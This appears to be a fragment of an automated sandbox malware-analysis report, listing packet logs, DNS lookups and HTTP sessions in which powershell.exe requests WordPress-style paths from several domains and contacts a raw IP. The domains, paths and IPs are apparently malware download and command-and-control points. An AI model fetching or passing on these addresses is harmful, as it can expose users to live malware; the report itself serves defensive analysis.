                                            Jan 6, 2021 08:45:13.602288961 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602308989 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602325916 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602385998 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602412939 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602436066 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602557898 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602579117 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602585077 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602608919 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602627039 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602633953 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602643967 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602669954 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602677107 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602696896 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602711916 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602720976 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602742910 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602746010 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602766037 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602788925 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602799892 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602811098 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602832079 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602834940 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602859020 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602884054 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602888107 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602909088 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602931976 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602941036 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602957010 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602979898 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602988958 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603003025 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603028059 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603034973 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603050947 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603077888 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603082895 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603102922 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603126049 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603133917 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603152037 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603177071 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603182077 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603202105 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603228092 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603230000 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603251934 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603280067 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603285074 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603305101 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603328943 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.603332996 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.603390932 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.604424953 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870629072 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870657921 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870677948 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870696068 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870712996 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870729923 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870747089 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870762110 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870778084 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870790005 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870801926 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870815039 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870827913 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870842934 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870841980 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870865107 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870867968 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870882988 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870887041 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870898962 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870913982 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870923996 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870932102 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870946884 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870959044 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.870959997 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870976925 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.870989084 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.871018887 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.871697903 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.871959925 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.871985912 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872021914 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872092009 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872112989 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872136116 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872153997 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872157097 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872173071 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872178078 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872198105 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872217894 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872235060 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872236967 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872251987 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872261047 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872281075 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872303009 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872304916 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872325897 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872345924 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872350931 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872366905 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872386932 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872387886 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872406960 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872426987 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872426987 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872446060 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872466087 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872469902 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872484922 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872500896 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872508049 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872541904 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.872580051 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872714043 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.872765064 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.137706041 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137737036 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137749910 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137763023 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137780905 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137797117 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137814045 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137830019 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137845993 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137861967 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137881041 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137897968 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137912989 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137928009 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137943029 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137958050 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137974024 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.137988091 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138006926 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138032913 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138048887 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138065100 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138180971 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.138190985 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138207912 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138211012 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.138216019 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.138643980 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.138804913 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138827085 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138839960 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:14.138921022 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.143651962 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.441883087 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:14.442040920 CET4916680192.168.2.22104.27.145.251
                                            Jan 6, 2021 08:45:14.442574024 CET4916580192.168.2.22104.18.61.59
                                            Jan 6, 2021 08:45:31.042794943 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.114829063 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.114919901 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.116019964 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.116136074 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.189097881 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.189213991 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.262099981 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.262192965 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.335022926 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.780097008 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.780126095 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.780339003 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:45:31.851975918 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:45:31.852164030 CET4916980192.168.2.225.2.136.90
                                            Jan 6, 2021 08:46:36.777776003 CET80491695.2.136.90192.168.2.22
                                            Jan 6, 2021 08:46:36.777899027 CET4916980192.168.2.225.2.136.90

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:45:09.628824949 CET5219753192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:09.685398102 CET53521978.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:09.819693089 CET5309953192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:09.886931896 CET53530998.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:10.005924940 CET5283853192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:10.062089920 CET53528388.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:10.403311014 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:11.413362026 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.427134991 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.464422941 CET53612008.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:12.474410057 CET4954853192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.530816078 CET53495488.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:13.475646019 CET53612008.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:14.494803905 CET53612008.8.8.8192.168.2.22

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Jan 6, 2021 08:45:13.475728035 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable
                                            Jan 6, 2021 08:45:14.495052099 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 6, 2021 08:45:09.628824949 CET192.168.2.228.8.8.80x51f2Standard query (0)wpsapk.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.819693089 CET192.168.2.228.8.8.80x4aa4Standard query (0)sofsuite.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.005924940 CET192.168.2.228.8.8.80x70c0Standard query (0)veterinariadrpopui.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.403311014 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:11.413362026 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.427134991 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.474410057 CET192.168.2.228.8.8.80xa6edStandard query (0)khanhhoahomnay.netA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com104.18.61.59A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com104.18.60.59A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com172.67.141.14A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com104.27.145.251A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com172.67.158.72A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com104.27.144.251A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.062089920 CET8.8.8.8192.168.2.220x70c0No error (0)veterinariadrpopui.com209.59.139.39A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.464422941 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.530816078 CET8.8.8.8192.168.2.220xa6edNo error (0)khanhhoahomnay.net210.86.239.69A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:13.475646019 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:14.494803905 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • wpsapk.com
                                            • sofsuite.com
                                            • veterinariadrpopui.com
                                            • khanhhoahomnay.net
                                            • 5.2.136.90

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249165104.18.61.5980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:09.751085043 CET0OUTGET /wp-admin/v/ HTTP/1.1
                                            Host: wpsapk.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.806808949 CET1INHTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d221298cac29a42f50dcdd09dcc6b15471609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 077841329b0000c78df6240000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FLiijikAq1yY5im%2FIn1m0VtxDMUfFiQ8BMCPtMp3GNvn9ZyFRC%2FrDigSlLkdodQ20cvVRacEfupGVCZjEW0vg9MtdQR7Q1SBOfsp"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d16428b1c78d-AMS
                                            Data Raw: 31 30 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e
                                            Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,in
                                            Jan 6, 2021 08:45:09.806837082 CET3INData Raw: 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f
                                            Data Ascii: itial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
                                            Jan 6, 2021 08:45:09.806852102 CET4INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 66 6c 61 67 67
                                            Data Ascii: "> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p>
                                            Jan 6, 2021 08:45:09.806866884 CET5INData Raw: 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70 65 72 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c
                                            Data Ascii: v>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm
                                            Jan 6, 2021 08:45:09.806881905 CET5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.2249166104.27.145.25180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:09.938826084 CET6OUTGET /wp-includes/2jm3nIk/ HTTP/1.1
                                            Host: sofsuite.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.997203112 CET7INHTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d04c9b9fb7e02b7ebebe0ca82b9ae3faa1609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 07784133570000410ec883f000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k%2FHK4LVc0OWoEqoA6xqJR%2BidQk%2BEpiHeBJ5Uo%2FBOjXVc5C4OawfY9qh%2BKgwfdm80OopzZZ%2BzV4oWjY8BrJTNUmi76ipi8m7WWqLCMt4%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d1655bae410e-PRG
